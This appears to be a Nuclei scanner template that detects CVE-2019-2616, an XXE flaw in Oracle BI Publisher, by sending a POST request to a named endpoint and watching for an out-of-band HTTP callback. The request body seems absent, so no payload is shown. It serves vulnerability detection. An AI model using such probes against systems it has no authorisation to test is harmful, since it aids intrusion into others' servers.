id: CVE-2019-2616 info: name: XXE in Oracle Business Intelligence and XML Publisher author: pdteam severity: high description: Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-2616 - https://www.exploit-db.com/exploits/46729 tags: cve,cve2019,oracle,xxe,oast classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.20 cve-id: CVE-2019-2616 requests: - raw: - | POST /xmlpserver/ReportTemplateService.xls HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Type: text/xml; charset=UTF-8 matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http"